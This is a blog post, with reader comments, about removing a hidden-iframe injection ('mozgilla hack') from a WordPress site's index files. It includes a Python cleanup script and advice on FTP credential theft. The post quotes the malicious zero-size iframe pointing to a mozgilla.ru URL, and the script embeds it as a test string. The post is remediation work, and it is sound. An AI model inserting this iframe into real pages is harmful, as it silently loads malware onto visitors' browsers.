mozgilla hack – index.* files corrupted

This just recently happened to me (last night actually), I think my host got hacked. I have no idea why or how.

OK, so straight to the point. This morning my blog – a WordPress installation – was dead. I was getting either an “access denied” or a “you don’t have permission to access…” error. First I thought the blog itself had broken somehow, so I tried to get into the admin panel (e.g. georgezamfir.com/wp-admin/)… and I got the same error. Crap. At this point I was clueless; I searched online for any Netfirms issues, thinking they had messed something up, and found nothing.

All right, back to basics. I FTP-ed to my host to take a look at the files, and this is when I realized that all my index.* files (index.php, index.html, index.htm, etc.) were screwed: they had no permissions set, and they all contained some code linking to mozgilla.ru that was not familiar to me. Duh, I don’t use iframes. There isn’t much online on this except for this page: badwarebusters.org/main/itemview/11308.

I had the exact same code in my files:
<iframe frameborder="0" onload="if (!this.src){ this.src='http://mozgilla.ru:8080/index.php'; this.height='0'; this.width='0';}" >klsgawbozfesywooikgbcetdnwaubys</iframe>
However, in the .php files the code above was at the very end of the file, while in the .html files it was right after the <body> tag.

Now, as mentioned in the badwarebusters article above, the code can be “injected by script” directly inside the files or through .htaccess when the pages are requested. In my case the code was injected directly into the files (thank god) and I removed it manually.

For WordPress installations/blogs, the following files are affected (remember to set the permissions first, otherwise you won’t be able to edit the files):
/index.php
/wp-admin/index-extra.php
/wp-admin/index.php
/wp-content/index.php
/wp-content/themes/index.php
/wp-content/themes/{all themes folders}/index.php (I simply removed the themes I didn’t need)
/wp-includes/default-filters.php
/wp-includes/default-widgets.php

Also, in my case I didn’t have to change the .htaccess (in the WordPress folder); it should look something like the code below. You need these lines for the permalinks, so don’t delete them.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

So, this is the (manual) way of saving your website from the pesky mozgilla hack:

  • find the “corrupted” files (easy, sort by date – recently modified files have the code),
  • set the right permissions (chmod 644 index.php) and
  • manually remove the code from the files.
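As an added example (not the author’s code, and not from the badwarebusters page), here is a Python script that automates the three manual steps above on a local copy of the WordPress tree and also checks the .htaccess against the permalink block shown earlier. It keys on the `onload="if (!this.src)` trick rather than on the mozgilla.ru host name, because the same markup is reported with other domains; the list of affected file names and the .htaccess block come from the post, while the function names, the mode handling and the sample files built in demo() are this example’s own assumptions.

```python
"""Automate the post's three manual steps on a local copy of a WordPress
tree, then check .htaccess against the permalink block quoted in the post.
Added example; function names, TARGET_NAMES and the sample files built in
demo() are assumptions of this example, not the author's code."""
import os
import re
import stat
import tempfile
from pathlib import Path

# Key on the onload trick, not the host: the same markup shows up with other
# domains. [^>]* stays inside the opening tag, DOTALL spans the filler text.
INJECTED_IFRAME = re.compile(
    r"<iframe\b[^>]*onload=[\"']if\s*\(!this\.src\)[^>]*>.*?</iframe>",
    re.IGNORECASE | re.DOTALL,
)
# File names the post lists as affected in a WordPress install.
TARGET_NAMES = {"index.php", "index.html", "index.htm", "index-extra.php",
                "default-filters.php", "default-widgets.php"}
# The permalink block the post says .htaccess should contain.
EXPECTED_HTACCESS = [
    "# BEGIN WordPress", "<IfModule mod_rewrite.c>", "RewriteEngine On",
    "RewriteBase /", "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d", "RewriteRule . /index.php [L]",
    "</IfModule>", "# END WordPress",
]
# Constructed copy of the iframe quoted in the post (straight quotes, as in
# the real files), used only to build the sample install in demo().
INJECTED = ('<iframe frameborder="0" onload="if (!this.src){ this.src='
            "'http://mozgilla.ru:8080/index.php'; this.height='0'; "
            'this.width=\'0\';}" >klsgawbozfesywooikgbcetdnwaubys</iframe>')


def clean_file(path: Path, mode: int = 0o644) -> dict:
    """Steps 2 and 3: restore the mode (the post's files were ----------,
    i.e. 000), then strip every injected iframe. Returns a small report."""
    original_mode = stat.S_IMODE(path.stat().st_mode)
    if original_mode != mode:
        os.chmod(path, mode)
    text = path.read_text(encoding="utf-8", errors="surrogateescape")
    cleaned, removed = INJECTED_IFRAME.subn("", text)
    if removed:
        path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return {"name": path.name, "path": str(path),
            "original_mode": original_mode, "removed": removed}


def clean_tree(root: Path) -> list:
    """Step 1: find the target files, most recently modified first, and clean
    them. Returns reports for files that had injected markup or an odd mode."""
    targets = [p for p in root.rglob("*") if p.is_file() and p.name in TARGET_NAMES]
    targets.sort(key=lambda p: p.stat().st_mtime, reverse=True)
    reports = [clean_file(p) for p in targets]
    return [r for r in reports if r["removed"] or r["original_mode"] != 0o644]


def htaccess_findings(path: Path) -> list:
    """Note a WordPress block that differs from the expected one, and any
    directive outside that block (the other injection route the post mentions)."""
    lines = [ln.strip() for ln in path.read_text(encoding="utf-8").splitlines()]
    try:
        start = lines.index("# BEGIN WordPress")
        end = lines.index("# END WordPress", start)
    except ValueError:
        return ["no '# BEGIN WordPress' ... '# END WordPress' block found"]
    notes = []
    if lines[start:end + 1] != EXPECTED_HTACCESS:
        notes.append("WordPress block differs from the expected permalink rules")
    for i, line in enumerate(lines):
        if start <= i <= end or not line or line.startswith("#"):
            continue
        notes.append(f"line {i + 1}: directive outside the WordPress block: {line}")
    return notes


def demo(root: Path) -> dict:
    """Build a constructed sample install under root and run the cleanup."""
    theme = root / "wp-content" / "themes" / "default"
    theme.mkdir(parents=True)
    php = root / "index.php"          # .php: iframe appended at the very end
    php.write_text("<?php\nrequire('./wp-blog-header.php');\n" + INJECTED + "\n")
    php.chmod(0)                      # the ---------- mode from the post
    html = theme / "index.html"       # .html: iframe right after <body>
    html.write_text("<html><body>" + INJECTED + "<p>hello</p></body></html>")
    untouched = root / "wp-content" / "index.php"
    untouched.write_text("<?php // Silence is golden.\n")
    untouched.chmod(0o644)
    (root / ".htaccess").write_text("\n".join(EXPECTED_HTACCESS) + "\n")
    files = clean_tree(root)
    still_infected = sum(bool(INJECTED_IFRAME.search(p.read_text()))
                         for p in (php, html, untouched))
    return {"files": files, "still_infected": still_infected,
            "htaccess": htaccess_findings(root / ".htaccess")}


def run_demo() -> dict:
    """Run demo() in a throwaway directory; handy for a quick dry run."""
    with tempfile.TemporaryDirectory() as tmp:
        return demo(Path(tmp))


if __name__ == "__main__":
    for r in run_demo()["files"]:
        print(f"{r['path']}: mode {r['original_mode']:03o}, removed {r['removed']}")
```

Run it against a copy downloaded over FTP (clean_tree(Path("site-copy"))), check the reports, and upload the cleaned files afterwards. Cleaning the files does not address how the iframe got there in the first place: with a valid FTP login the same files can be rewritten again, so the password change recommended in the comments below still has to happen.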

I hope this helps others, as I was going nuts trying to find the solution. And by the way, I found the solution, but I still don’t know what caused the problem. However, here are some tips from Google on this subject.

4 Comments to “mozgilla hack – index.* files corrupted”

  1. Thomas J. Raef

    You may have found your files with the wrong permissions, but they were set that way by the hackers.

    The way this works is that a PC with FTP access to a website gets a virus. I know, everyone has anti-virus software these days. However, anti-virus vendors are faced with 30,000 new viruses everyday so they started creating more generic signatures. These signatures are ill-prepared for the newer viruses that hackers claim are FUD (Fully Un Detectable).

    These viruses steal FTP login credentials, send them to a server which carries out the website infection with valid FTP credentials. When “they” upload their infected files, the permissions are set to 777. This makes it easier for them to modify later on if you remove their work the first time.

    So, without scanning all PCs with FTP access for viruses, the website is still vulnerable to re-infection.

    First, change all FTP passwords. Then, because these viruses also know how to evade detection of the currently installed anti-virus software, it’s recommended to use something different. Many have had good success with AVG, Avast or Avira. Select one of those and use it with Malwarebytes – on every PC with FTP access to the website.

    Also, keep in mind that while your specific infection showed the mozgilla.ru domain, many other domains are used as well. The same infectious code, but a different domain.

    I just thought I’d share my experience in dealing with this for so many site owners.

  2. George

    Well, my index.* files didn’t have any permissions (e.g. ---------- 1 668 552 3669 Oct 30 18:16 index.php); if it were 777 it’d have been easier for me to figure it out. But it had no permissions and I couldn’t edit them… until I set my own permissions again.

    Anyhow, you’re right in all other respects. Thanks for the info.

  3. Christian Louboutin Shoes

    Thank you for useful info. :-)

  4. Ashleymsm

    Your site is like a blonde with a brain. I like it. All jokes apart, very informative post and equally impressive design.
